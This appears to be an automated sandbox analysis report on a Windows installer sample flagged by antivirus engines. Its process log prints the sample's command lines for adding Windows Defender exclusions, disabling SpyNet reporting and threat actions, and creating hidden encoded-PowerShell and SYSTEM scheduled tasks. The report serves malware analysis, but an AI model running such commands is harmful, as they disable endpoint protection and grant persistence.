                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\gpupdate.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):129
                            Entropy (8bit):4.366220328806915
                            Encrypted:false
                            SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
                            MD5:EF6D648C3DA0518B784D661B0C0B1D3D
                            SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
                            SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
                            SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
                            Malicious:false
                            Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.996908423754259
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:7604002
                            MD5:e99e15a440798e20c682eb859b3f7885
                            SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
                            SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
                            SHA512:6cbbae34ab571522545be0c27e1f13cf0d8545f8ba69c3d343b3ac1c1f113b7dbe6e3ce26a3897a1197bc0b57378165ab8145c29332b99d83e50b87c513e7d5e
                            SSDEEP:196608:91OcMHdXjgqBmVcMymSmuw3lIk3+C83fqpI/jdyNVaZ4g:3OcuF9m51T1Iku93f8wd8Rg
                            TLSH:6276333174C19CF2DE173231A28D2AE175F6EDD84D636A3717428A3A297D24AC3B1E53
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........
                            Icon Hash:8484d4f2b8f47434
                            Entrypoint:0x414b04
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:
                            Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:3786a4cf8bfee8b4821db03449141df4
                            Instruction
                            push ebp
                            mov ebp, esp
                            push FFFFFFFFh
                            push 0041B9E0h
                            push 00414A2Ch
                            mov eax, dword ptr fs:[00000000h]
                            push eax
                            mov dword ptr fs:[00000000h], esp
                            sub esp, 58h
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-18h], esp
                            call dword ptr [0041B074h]
                            xor edx, edx
                            mov dl, ah
                            mov dword ptr [004233D0h], edx
                            mov ecx, eax
                            and ecx, 000000FFh
                            mov dword ptr [004233CCh], ecx
                            shl ecx, 08h
                            add ecx, edx
                            mov dword ptr [004233C8h], ecx
                            shr eax, 10h
                            mov dword ptr [004233C4h], eax
                            push 00000001h
                            call 00007FA12CD567EBh
                            pop ecx
                            test eax, eax
                            jne 00007FA12CD5595Ah
                            push 0000001Ch
                            call 00007FA12CD55A18h
                            pop ecx
                            call 00007FA12CD5629Dh
                            test eax, eax
                            jne 00007FA12CD5595Ah
                            push 00000010h
                            call 00007FA12CD55A07h
                            pop ecx
                            xor esi, esi
                            mov dword ptr [ebp-04h], esi
                            call 00007FA12CD5840Ch
                            call dword ptr [0041B078h]
                            mov dword ptr [00425A3Ch], eax
                            call 00007FA12CD582CAh
                            mov dword ptr [00423340h], eax
                            call 00007FA12CD58073h
                            call 00007FA12CD57FB5h
                            call 00007FA12CD57A10h
                            mov dword ptr [ebp-30h], esi
                            lea eax, dword ptr [ebp-5Ch]
                            push eax
                            call dword ptr [0041B07Ch]
                            call 00007FA12CD57F46h
                            mov dword ptr [ebp-64h], eax
                            test byte ptr [ebp-30h], 00000001h
                            je 00007FA12CD55958h
                            movzx eax, word ptr [ebp+00h]
                            Programming Language:
                            • [ C ] VS98 (6.0) SP6 build 8804
                            • [C++] VS98 (6.0) SP6 build 8804
                            • [ C ] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [EXP] VC++ 6.0 SP5 build 8804
                            Name                                  Virtual Address  Virtual Size  Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x1e9e4          0x64          .rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x27000          0xa60         .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_IAT             0x1b000          0x1f8         .rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                            Name     Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type             Entropy               Characteristics
                            .text    0x1000           0x199ea       0x19a00   False     0.5822884908536585   DOS executable (COM)  6.608494417524647     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata   0x1b000          0x4494        0x4600    False     0.31166294642857145  data                  4.368016436198423     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data    0x20000          0x5a48        0x3200    False     0.122890625          data                  1.370539432871311     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .sxdata  0x26000          0x4           0x200     False     0.02734375           data                  0.020393135236084953  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc    0x27000          0xa60         0xc00     False     0.3388671875         data                  3.3019646948427273    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            Name           RVA      Size   Type                                                            Language  Country
                            RT_ICON        0x274a0  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 640  English   United States
                            RT_ICON        0x27788  0x128  Device independent bitmap graphic, 16 x 32 x 4, image size 192  English   United States
                            RT_DIALOG      0x278d8  0xb8   data                                                            English   United States
                            RT_STRING      0x27990  0x94   data                                                            English   United States
                            RT_STRING      0x27a28  0x34   data                                                            English   United States
                            RT_GROUP_ICON  0x278b0  0x22   data                                                            English   United States
                            RT_VERSION     0x271e0  0x2bc  data                                                            English   United States
                            DLL           Import
                            OLEAUT32.dll  VariantClear, SysAllocString
                            USER32.dll    SendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
                            SHELL32.dll   ShellExecuteExA
                            KERNEL32.dll  GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread
                            Language of compilation system  Country where language is spoken  Map
                            English                         United States
                            No network behavior found

                            Target ID:1
                            Start time:19:03:57
                            Start date:24/11/2022
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\file.exe
                            Imagebase:0x400000
                            File size:7604002 bytes
                            MD5 hash:E99E15A440798E20C682EB859B3F7885
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:3
                            Start time:19:03:59
                            Start date:24/11/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
                            Wow64 process (32bit):true
                            Commandline:.\Install.exe
                            Imagebase:0x400000
                            File size:6571809 bytes
                            MD5 hash:65D01849A2062434BCE6C580CDA92A1D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:5
                            Start time:19:04:01
                            Start date:24/11/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
                            Wow64 process (32bit):true
                            Commandline:.\Install.exe /S /site_id "525403"
                            Imagebase:0x230000
                            File size:7104512 bytes
                            MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 51%, ReversingLabs
                            Reputation:low

                            Target ID:10
                            Start time:19:04:04
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0x13e0000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:11
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:12
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0x13e0000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:13
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6ffff0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:14
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:15
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:16
                            Start time:19:04:05
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:17
                            Start time:19:04:06
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:18
                            Start time:19:04:06
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:19
                            Start time:19:04:06
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:20
                            Start time:19:04:09
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:21
                            Start time:19:04:09
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:22
                            Start time:19:04:09
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /run /I /tn "gAhELFxgt"
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:23
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:24
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                            Imagebase:0x7ff7fbaf0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            Target ID:25
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:26
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /DELETE /F /TN "gAhELFxgt"
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:27
                            Start time:19:04:10
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:28
                            Start time:19:04:14
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
                            Imagebase:0x1160000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:29
                            Start time:19:04:15
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:30
                            Start time:19:04:16
                            Start date:24/11/2022
                            Path:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
                            Imagebase:0x1090000
                            File size:7104512 bytes
                            MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 51%, ReversingLabs

                            Target ID:31
                            Start time:19:04:17
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                            Imagebase:0xe50000
                            File size:430592 bytes
                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Target ID:32
                            Start time:19:04:18
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:33
                            Start time:19:04:25
                            Start date:24/11/2022
                            Path:C:\Windows\System32\gpupdate.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\gpupdate.exe" /force
                            Imagebase:0x7ff70abd0000
                            File size:29184 bytes
                            MD5 hash:47C68FE26B0188CDD80F744F7405FF26
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:34
                            Start time:19:04:26
                            Start date:24/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7fcd70000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:37
                            Start time:19:04:27
                            Start date:24/11/2022
                            Path:C:\Windows\System32\gpscript.exe
                            Wow64 process (32bit):false
                            Commandline:gpscript.exe /RefreshSystemParam
                            Imagebase:0x7ff66dce0000
                            File size:44544 bytes
